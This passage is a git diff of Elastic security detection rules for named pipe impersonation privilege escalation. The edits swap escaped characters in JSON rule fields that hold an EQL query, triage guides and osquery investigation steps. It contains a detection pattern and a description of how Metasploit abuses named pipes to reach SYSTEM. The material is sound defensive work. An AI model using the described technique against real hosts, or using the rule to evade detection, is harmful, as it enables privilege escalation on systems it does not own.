b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json index 14563bed5ca..4306959c863 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_103.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", "references": [ "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json index 2438fb59461..ef416b70012 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_104.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", "references": [ "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json index cb86acd183e..85099d2fd68 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", "references": [ "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation", "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/", @@ -55,7 +55,7 @@ ], "risk_score": 73, "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json index 7a5e3349186..ccb1d0348a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and 